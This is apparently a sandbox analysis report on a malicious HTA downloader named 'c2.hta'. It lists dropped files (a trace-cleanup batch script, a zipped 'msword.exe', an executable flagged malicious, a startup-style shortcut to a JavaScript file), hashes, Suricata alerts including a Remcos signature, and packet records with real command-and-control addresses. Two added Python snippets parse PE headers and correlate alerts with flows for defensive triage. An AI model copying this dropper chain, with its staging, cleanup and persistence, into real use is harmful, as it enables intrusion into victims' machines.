                                                                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                  Category:dropped
                                                                  Size (bytes):386528
                                                                  Entropy (8bit):7.9736851559892425
                                                                  Encrypted:false
                                                                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                  Malicious:false
                                                                  Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                  Category:dropped
                                                                  Size (bytes):1419751
                                                                  Entropy (8bit):7.976496077007677
                                                                  Encrypted:false
                                                                  SSDEEP:24576:/nZwYIGNPgeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fZwZG/WLxYGZN3mlind9i4ufFXpAXkru
                                                                  MD5:1F3D69524A9D7E17BD2363C81D130F1A
                                                                  SHA1:C2A4A08839CBA47BEE2B601975F7C4F0CC191091
                                                                  SHA-256:D0FFBEC8502A0BE88A99F6708987658FEBE4CF3B6B79AF219C53EFF6458F9D9D
                                                                  SHA-512:A4CBE7073A7CB4C5E33E1CD903CCD7F24B78A04C037BFA1D90D9A5BBD12AF60E3DFFD6546277D1B765CA1DAC1CDA28D24D3454C81952B72D97CAF84DF395E99A
                                                                  Malicious:false
                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                  Process:C:\Windows\SysWOW64\mshta.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):123
                                                                  Entropy (8bit):4.743980843348089
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDCMN2RuXcov2lOt+WfWBKEuB8yAL/VLYzLr5+VovuxVz4y:hWK2vo+cwv8EhL/VLULdqo2xr
                                                                  MD5:F499EEC2ED267670E37C9B9E95939756
                                                                  SHA1:32ED7465C5B0C93ACBB4E19369EB4114A55D6B2A
                                                                  SHA-256:31C66BC2D0699E4443ADD0A4F3E0C90AD3883CEA19B1AE55EE9C717BF9B664A0
                                                                  SHA-512:A931A7C75AB7665603F1BBD81A443D50B79F3E7B2A244D3C4D3277246E00FE40332526D6CF52BE3F32B1294B9BC5476511431D1A819BEE063ECA80330FF991EC
                                                                  Malicious:false
                                                                  Preview:@echo off..timeout /t 10 >nul..del "C:\Users\user\Desktop\downloaded.hta"..del temp.bat..del msword.zip..del cleanup.bat..
                                                                  Process:C:\Windows\SysWOW64\mshta.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):120
                                                                  Entropy (8bit):4.514369106333414
                                                                  Encrypted:false
                                                                  SSDEEP:3:jLtzKsTGN8cVzKjA2AGN8+1lg+uZDt+kiE2J5xAIhMn:3tzKAGN8OzKjANGN8QgNNwkn23fhM
                                                                  MD5:D9CAF7EC781CEA5E2621CD6BC7494BFA
                                                                  SHA1:4C169D953752343B7D15A151EEC60572068E95B5
                                                                  SHA-256:8B935EAF174C50ECD0B4863F74817634B97D1369E6A7AD3DFAC67A42BDE1BD68
                                                                  SHA-512:CA168B9186E26732C0B635CE0F262CC4B3149517AAA5A7486A89C9E953AFF9494DADDB3A8FA1648998083F9FB48A02A04343FD6A98C963E52724B066AB281DCF
                                                                  Malicious:false
                                                                  Preview:Download started successfully...Download completed successfully and saved to: C:\Users\user\AppData\Local\Temp\temp.bat
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):1294224
                                                                  Entropy (8bit):7.999848840340146
                                                                  Encrypted:true
                                                                  SSDEEP:24576:HHCSIIQlCG6xs6b/dCMnimOP0TBepVjSIZFMw+zK1QAqcqINtBP9:HHo6W6bhniN0TBejtyw7lqIjBV
                                                                  MD5:48CB93BCCBC3F6DBDCADAB99F86F6287
                                                                  SHA1:1677BAD633D8AC0FAD6CF3E888E1AB1E6A3528A7
                                                                  SHA-256:353493A6CABD5220903133D868547BB1D6CFD63CB79C87A26F08D733244F8212
                                                                  SHA-512:76DE57C73D95075D9C9BFED0156D9C6DBA7866E2231C2008AAC61A1899D823F947BD2FC53B437F3827417B99D9A6EB99F290C0514BFFE32A11B60E70614391D7
                                                                  Malicious:true
                                                                  Preview:PK.........%'Z$.V......F......msword.exe..|T.?~.G.l.E...4BP....(qA......f...*.....s...M8Ie=....jkoM..mm...... .J-...5".Y7.*1,.9..3......y......3.g.y~..9.o.X.I.dG2MIj..O......\.........2...,.-^.z.=....;W.X....x...x...[....\.tb^^NI....~..Y..2%..wM.......S~..%..L..c...u....n..ep..4.-..P?'S.%Y-...IZ... I.!I:.p#...O...K.$......|<.5.{w......7....e|...-.aQ...Jd..$-.,........x..t......B4V..0..x..%w.wJ.]WIb..V..........>Pc..i#....k.."..vHR. ....nu...4.m._...p>.w...+.x.@..K.e..|........Wet....:.K....C.....B..wp.,)Zi.......0.6o.I.c6.!c..<.......x./..3&..e...K.K..1...u....|...C!.U...8?s=.f....3.w..om.rD.|..E...9U.g.........r;..p=+.y....0&.....YP..t9i..5...,x...Z.y@......6.0MS.o...5.L2.f..*4..UF.3b.....@.]f`p.,...\3/l..V..2&.C&l.R....~.TZ.[..'x.N<.....I./Z.i.c.N.d...73..xs.[.>I2n.:zwZ.P8.M...N....r.e{.y.......6.j.......6.rK.^.8..msk...<...x..-..*....h.N;...F...I........Q....G.}...V.Y.w.........oA....Z9.....+6.B..D,...@N..|...m>.f.}.m.5.
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1328655
                                                                  Entropy (8bit):7.986603369893745
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Jdh/TQ8lCGwfae/DdysbyC6PW//Epzjuc/9c+OzERQqq0GIxJBv:7wSe/fby9W//EpBe+BxGIfBv
                                                                  MD5:5BF20E8953B3219CD4F60BE10A73509F
                                                                  SHA1:C422DC032EB0A63620DDBDDAAC7B2D7909027A8F
                                                                  SHA-256:B59CBB4DBE800B77D1DCAC6E13FE722816EAE5665D87D05B7C5A206430320F6B
                                                                  SHA-512:2E339930FC909DBFB49985EFC730F6DC09459DF4A690E0AFF14CC4175B7921C4AD5111FCB68287A59526BFE0981B094F19196145279BEAA83AA0B9062B8B8A62
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n...j...B...8............@.................................|2....@.................................4........@..~...............x)......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc...~....@......................@..@.reloc..2............N..............@..B................................................................................................................................................................................................................................................................................................................
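The preview of this dropped PE32 shows its section table by name: .text, .rdata, .data, .ndata, .rsrc and .reloc. A section called .ndata is what NSIS-built installer stubs carry, so reading the section table straight from the header is a cheap triage step before unpacking. The parser below is an added example, not code from the report or from Joe Sandbox; build_sample_pe() constructs a header-only stub with that section layout and the i386 machine type as test input, because the report's dotted preview is not the real bytes. Offsets follow the PE/COFF layout (e_lfanew at 0x3C, 20-byte COFF header, 40-byte section headers); the NSIS rule is a heuristic.

```python
"""Read a PE's section table and flag the '.ndata' section of NSIS-built installers.

Added example; not code from the sandbox report or from Joe Sandbox.
build_sample_pe() constructs a header-only stub mirroring the section layout
seen in the dropped PE32's preview; it is constructed test data, not the binary.
"""
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C
PE32_MAGIC = 0x10B
COFF_FMT = "<HHIIIHH"         # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
                              # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
                              # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
                              # NumberOfLinenumbers, Characteristics


def pe_sections(data):
    """Return (machine, [section names]) from the raw bytes of a PE file.

    Raises ValueError for non-PE input or for a header cut off before the end
    of the section table (a truncated sandbox preview, for instance).
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff_off = e_lfanew + 4
    try:
        machine, nsec, _, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff_off)
    except struct.error as e:
        raise ValueError("truncated COFF header") from e
    sec_off = coff_off + struct.calcsize(COFF_FMT) + opt_size
    sec_len = struct.calcsize(SECTION_FMT)
    if len(data) < sec_off + nsec * sec_len:
        raise ValueError("truncated section table")
    names = []
    for i in range(nsec):
        raw_name = struct.unpack_from(SECTION_FMT, data, sec_off + i * sec_len)[0]
        names.append(raw_name.rstrip(b"\x00").decode("ascii", "replace"))
    return machine, names


def looks_like_nsis(data):
    """Heuristic: NSIS stubs keep their uninitialised data in a section named '.ndata'."""
    _, names = pe_sections(data)
    return ".ndata" in names


def build_sample_pe(section_names, machine=IMAGE_FILE_MACHINE_I386):
    """Construct a header-only PE32 stub (constructed test data, not a real binary)."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    opt_size = 0xE0  # size of a PE32 optional header with 16 data directories
    coff = struct.pack(COFF_FMT, machine, len(section_names), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", PE32_MAGIC).ljust(opt_size, b"\x00")
    sections = b"".join(
        struct.pack(SECTION_FMT, name.encode("ascii").ljust(8, b"\x00"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 * (i + 1), 0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(section_names))
    return dos + b"PE\x00\x00" + coff + opt + sections


if __name__ == "__main__":
    sample = build_sample_pe([".text", ".rdata", ".data", ".ndata", ".rsrc", ".reloc"])
    print(pe_sections(sample), looks_like_nsis(sample))
```

On a real dropped file, pass the file's bytes to pe_sections(); a ValueError on a short read means the sample was truncated rather than that it is not a PE.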
                                                                  Process:C:\Windows\SysWOW64\mshta.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (904), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):5541
                                                                  Entropy (8bit):5.2664681958555635
                                                                  Encrypted:false
                                                                  SSDEEP:96:CincTy8G+hpQyuPmhDGEhtKCZ+CdvloxEWaqNh3b3Z/OnSZtn5+Gs8HNSqCBXAyY:CincTy8G+hpQyuPmhDGEhtKCLCjaob39
                                                                  MD5:30F0E17A1AD41BCDC9A52049E5DA1884
                                                                  SHA1:FE3996616238A93B458232F693D8A4FE654C66C3
                                                                  SHA-256:7C8949DBD5C68356292318F49EEC561EAFF17E4056101AFA945176F4C9E46398
                                                                  SHA-512:8FE9485BC6DABB862BDC315C980C9E58D9A49D4BD5D616B12C870A5342718544E6ED00D3041787E1C21CD614A968DAF45C3D145742CA768AD49BFA546886D6C7
                                                                  Malicious:true
                                                                  Preview::: .... ... ......... ...... ... .. ...... ... .. ......... ... ....... ..:: ....... ...... . ... ...... .. .... ...... . .... ......... . .... .... .....:: .... ...... ... . .... ..... . ......... .... ................ .... ... ....:: ...... .......... .... . .... ....... ... . ...... ... ....... . .... .... ...:: ... ... .. .... .... . . ..... ......................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >), ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):100
                                                                  Entropy (8bit):4.889436845812483
                                                                  Encrypted:false
                                                                  SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5mKIGXQxjNLiqB5Gr4Fy:HRYF5yjowkn23mKpkNx5G0y
                                                                  MD5:A34A0DAF277C13FC5AFF64C0A7247999
                                                                  SHA1:FD9B47B23BD20B9903D8842AC8C17A9F96677E93
                                                                  SHA-256:1534FD0EC0B91D4DDD6A250523DEE4BDB80DCBDF9DF1440606B3BF31AB80E814
                                                                  SHA-512:7B45CB2183C7307EF7C7A89926D2289E5A49C49E53F2A635CFF49FC8898D2D346C686E6DF5F15280A918E6FDA78AE75E97B1769D5536293E75119E3ECDCE0E9A
                                                                  Malicious:true
                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" ..
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PDF document, version 1.4, 1 pages
                                                                  Category:dropped
                                                                  Size (bytes):393964
                                                                  Entropy (8bit):7.894863553506209
                                                                  Encrypted:false
                                                                  SSDEEP:6144:fz/0MaxA4h4379ErMr1NPe8ThAvXG4e5c8m1TCso1/kWS7uu:fz/0MaqxKy1NkvXG4MpmNokF
                                                                  MD5:57F09EA46C7039EA45BB3FD01BBD8C80
                                                                  SHA1:1365FF5E6E6EFC3E501D350711672F6A232AA9F8
                                                                  SHA-256:3850E8022E3990B709DA7CDDBFD3F830EB86F34AF89D5939E2999C1E7DE9766F
                                                                  SHA-512:6DE0ACD9D03BDE584A7B2C2C7781530BA7504622B518523993311AD6174D2A9890E9D230A2A3A51D76615111A9F62259A9615378440690F20708B201B19A17F8
                                                                  Malicious:true
                                                                  Preview:%PDF-1.4.%......4 0 obj.<</Linearized 1/L 393964/O 6/E 362617/N 1/T 393770/H [ 1316 238]>>.endobj. .xref..4 51..0000000016 00000 n..0000001554 00000 n..0000001614 00000 n..0000002242 00000 n..0000002407 00000 n..0000002915 00000 n..0000003346 00000 n..0000003757 00000 n..0000003803 00000 n..0000005034 00000 n..0000006941 00000 n..0000008869 00000 n..0000010482 00000 n..0000011608 00000 n..0000012618 00000 n..0000012731 00000 n..0000013728 00000 n..0000014512 00000 n..0000014563 00000 n..0000014676 00000 n..0000014801 00000 n..0000029764 00000 n..0000030031 00000 n..0000058294 00000 n..0000058547 00000 n..0000085116 00000 n..0000085374 00000 n..0000094559 00000 n..0000094824 00000 n..0000094951 00000 n..0000095014 00000 n..0000095044 00000 n..0000095120 00000 n..0000113594 00000 n..0000113891 00000 n..0000113954 00000 n..0000114069 00000 n..0000132543 00000 n..0000191838 00000 n..0000192135 00000 n..0000192913 00000 n..0000193209 00000 n..0000196912 00000 n..0000197906 0

Process:C:\Windows\SysWOW64\timeout.exe
File Type:ASCII text, with CRLF line terminators, with overstriking
Category:dropped
Size (bytes):95
Entropy (8bit):4.176025638229203
Encrypted:false
SSDEEP:3:hYFEHgAR+mQRKVxLZtFctFst3g4t32vov:hYFEmaNZM3MXt3X
MD5:74D8C80188CB3C2AFD82E1821813B1CB
SHA1:EEB1D7DC1821B7841EE50BC53AFF890544ECFBDA
SHA-256:970057AABB3408E53F34A42FEF79D515688F7C1BBEA0567C1BF9B477B53F3AC2
SHA-512:677341DE20037DD57D34587520DF436CFE3DFB09824AC4926F0BAC3B428B3FACB2007CADC74254879736195E4573D44AB88DE80E52D1A559C7096E7F9587A5BE
Malicious:false
Preview:..Waiting for 10 seconds, press a key to continue ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

File type:HTML document, ASCII text, with CRLF line terminators
Entropy (8bit):4.548040738865506
TrID:
• HyperText Markup Language (12001/1) 40.67%
• HyperText Markup Language (11501/1) 38.98%
• HyperText Markup Language (6006/1) 20.35%
File name:c2.hta
File size:5'223 bytes
MD5:3a4f0963b57121e55af053325ea89240
SHA1:989889d50c78bff05ec5ed3e069bf72e58889c35
SHA256:41d88bc4022af4df4b7be44f3de7ff07e5619b2116400eb57460367b85958684
SHA512:fd7f39150b5dfb18f1aa1f0e02962f047a6777d4dd32452e1c4656e90b5bd13e374e06a6ead972ac6de0184447f76238b5fbcc3414bb1f686608c2f915a6316e
SSDEEP:96:uMkbYizhV1RgcQVx+P50wMmhtbSOyOsluH3:O0s1EMx0wFHlYU
TLSH:85B1205FAF83DF725933C426496AAC4DDE98850B1024C045B58C888E7F3537DA8D62F7
File Content Preview:<html>..<head>.. <title></title>.. <HTA:APPLICATION.. ID="downloadBatApp".. APPLICATIONNAME="BAT Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes".. SHOWINTASKB

Suricata IDS alerts

Timestamp                        SID      Signature                                               Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
2025-01-07T18:12:57.345392+0100  2827578  ETPRO MALWARE Likely Dropper Doc GET to .moe TLD        1         192.168.2.4  49731        108.181.20.35  443        TCP
2025-01-07T18:13:00.400496+0100  1810000  Joe Security ANOMALY Windows PowerShell HTTP activity   2         192.168.2.4  49735        193.26.115.39  443        TCP
2025-01-07T18:13:04.344206+0100  1810000  Joe Security ANOMALY Windows PowerShell HTTP activity   2         192.168.2.4  49738        193.26.115.39  443        TCP
2025-01-07T18:13:55.311475+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection             1         192.168.2.4  49756        193.26.115.39  7009       TCP
2025-01-07T18:13:56.432073+0100  2803304  ETPRO MALWARE Common Downloader Header Pattern HCa      3         192.168.2.4  49758        178.237.33.50  80         TCP
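The report presents network evidence in two shapes: one row per Suricata alert (above) and one row per TCP packet (the list that follows). For triage you normally want neither, but flows: one record per client/server 4-tuple with first and last seen, packet counts per direction, and the alerts that fired on that flow. The following is an added example and is not code from the Joe Sandbox report or from Joe Security. It re-enters a subset of the report's own packet rows and its alert rows pipe-delimited (that delimiter and the sample subset are this example's construction), takes 192.168.2.4 as the analysis host because every row in the report shows it as one endpoint, and truncates the report's nanosecond packet timestamps to microseconds because Python's strptime accepts no finer fraction. An alert whose 4-tuple has no packets in the supplied list, here the Remcos JA3 hit on 193.26.115.39:7009, is returned separately rather than silently dropped.

```python
# Added example, not part of the Joe Sandbox report: fold the report's per-packet
# rows into TCP flows and attach the Suricata alerts that fired on each flow.
# Sample rows are copied from the report's tables and re-entered pipe-delimited.
import re
from collections import namedtuple
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

CET = timezone(timedelta(hours=1))
ANALYSIS_HOST = "192.168.2.4"  # the sandbox VM, as it appears in the report's rows

# timestamp | src port | dst port | src ip | dst ip  (subset of the report's packet table)
PACKETS = """\
Jan 7, 2025 18:12:56.096196890 CET|49731|443|192.168.2.4|108.181.20.35
Jan 7, 2025 18:12:56.096231937 CET|443|49731|108.181.20.35|192.168.2.4
Jan 7, 2025 18:12:57.345413923 CET|443|49731|108.181.20.35|192.168.2.4
Jan 7, 2025 18:12:59.675587893 CET|49735|443|192.168.2.4|193.26.115.39
Jan 7, 2025 18:13:00.400516033 CET|443|49735|193.26.115.39|192.168.2.4
Jan 7, 2025 18:13:03.548898935 CET|49738|443|192.168.2.4|193.26.115.39
Jan 7, 2025 18:13:04.344151020 CET|443|49738|193.26.115.39|192.168.2.4
"""
# timestamp | sid | signature | severity | src ip | src port | dst ip | dst port | proto
ALERTS = """\
2025-01-07T18:12:57.345392+0100|2827578|ETPRO MALWARE Likely Dropper Doc GET to .moe TLD|1|192.168.2.4|49731|108.181.20.35|443|TCP
2025-01-07T18:13:00.400496+0100|1810000|Joe Security ANOMALY Windows PowerShell HTTP activity|2|192.168.2.4|49735|193.26.115.39|443|TCP
2025-01-07T18:13:04.344206+0100|1810000|Joe Security ANOMALY Windows PowerShell HTTP activity|2|192.168.2.4|49738|193.26.115.39|443|TCP
2025-01-07T18:13:55.311475+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.4|49756|193.26.115.39|7009|TCP
"""

Packet = namedtuple("Packet", "ts src_ip src_port dst_ip dst_port")
Alert = namedtuple("Alert", "ts sid signature severity src_ip src_port dst_ip dst_port")

@dataclass
class Flow:
    client_ip: str
    client_port: int
    server_ip: str
    server_port: int
    first_seen: datetime
    last_seen: datetime
    packets_out: int = 0  # analysis host -> server
    packets_in: int = 0   # server -> analysis host
    alerts: list = field(default_factory=list)

    @property
    def duration(self) -> float:
        return (self.last_seen - self.first_seen).total_seconds()

def parse_packet_ts(s: str) -> datetime:
    # "Jan 7, 2025 18:12:56.096196890 CET": strptime's %f takes at most six digits,
    # so the nanosecond field is truncated to microseconds before parsing.
    m = re.fullmatch(r"(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d{1,9}) CET", s.strip())
    if m is None:
        raise ValueError(f"unrecognised packet timestamp: {s!r}")
    micro = m.group(2)[:6].ljust(6, "0")
    return datetime.strptime(f"{m.group(1)}.{micro}", "%b %d, %Y %H:%M:%S.%f").replace(tzinfo=CET)

def parse_packets(text: str) -> list:
    rows = (line.split("|") for line in text.splitlines() if line.strip())
    return [Packet(parse_packet_ts(ts), sip, int(sp), dip, int(dp)) for ts, sp, dp, sip, dip in rows]

def parse_alerts(text: str) -> list:
    rows = (line.split("|") for line in text.splitlines() if line.strip())
    return [Alert(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), int(sid), sig, int(sev),
                  sip, int(sp), dip, int(dp)) for ts, sid, sig, sev, sip, sp, dip, dp, _ in rows]

def flow_key(src_ip, src_port, dst_ip, dst_port):
    # Canonical (client_ip, client_port, server_ip, server_port): both packet
    # directions and the alert's own 4-tuple land on the same flow.
    if src_ip == ANALYSIS_HOST:
        return (src_ip, src_port, dst_ip, dst_port)
    return (dst_ip, dst_port, src_ip, src_port)

def build_flows(packets) -> dict:
    flows = {}
    for p in packets:
        key = flow_key(p.src_ip, p.src_port, p.dst_ip, p.dst_port)
        f = flows.setdefault(key, Flow(*key, first_seen=p.ts, last_seen=p.ts))
        f.first_seen, f.last_seen = min(f.first_seen, p.ts), max(f.last_seen, p.ts)
        if p.src_ip == ANALYSIS_HOST:
            f.packets_out += 1
        else:
            f.packets_in += 1
    return flows

def correlate(flows: dict, alerts) -> list:
    # Attach each alert to its flow. Alerts whose 4-tuple has no packets in the list
    # (here the Remcos JA3 hit on 193.26.115.39:7009) are returned for follow-up.
    unmatched = []
    for a in alerts:
        f = flows.get(flow_key(a.src_ip, a.src_port, a.dst_ip, a.dst_port))
        if f is None:
            unmatched.append(a)
        else:
            f.alerts.append(a)
    return unmatched

def triage(packet_text: str = PACKETS, alert_text: str = ALERTS):
    flows = build_flows(parse_packets(packet_text))
    unmatched = correlate(flows, parse_alerts(alert_text))
    rows = [{"server": f"{f.server_ip}:{f.server_port}", "client_port": f.client_port,
             "out": f.packets_out, "in": f.packets_in, "duration_s": round(f.duration, 6),
             "sids": sorted({a.sid for a in f.alerts}),
             # Suricata severity 1 is the most severe, so the worst alert is the minimum
             "worst_severity": min((a.severity for a in f.alerts), default=None)}
            for f in sorted(flows.values(), key=lambda f: f.first_seen)]
    return rows, unmatched
```

Calling triage() on the embedded sample yields three flows (client ports 49731, 49735 and 49738, all to port 443) with their matching SIDs, and one unmatched alert, the Remcos JA3 signature on 193.26.115.39:7009, whose packets fall outside the supplied subset. Matching is on the 4-tuple only; the alert timestamp is a Suricata clock while the packet timestamps come from the capture, and in this report they differ by some tens of microseconds, so a time-window join would need a tolerance.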

TCP packets

Timestamp                            Source Port  Dest Port    Source IP      Dest IP
Jan 7, 2025 18:12:56.096196890 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:56.096231937 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:56.096312046 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:56.125907898 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:56.125922918 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:57.043327093 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:57.043417931 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:57.124852896 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:57.124872923 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:57.125186920 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:57.125263929 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:57.163829088 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:57.207329988 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:57.345413923 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:57.345437050 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:57.345473051 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:57.345494032 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:57.345510960 CET   443          49731        108.181.20.35  192.168.2.4
Jan 7, 2025 18:12:57.345510960 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:57.345550060 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:57.368654966 CET   49731        443          192.168.2.4    108.181.20.35
Jan 7, 2025 18:12:57.368673086 CET   443          49731        108.181.20.35  192.168.2.4
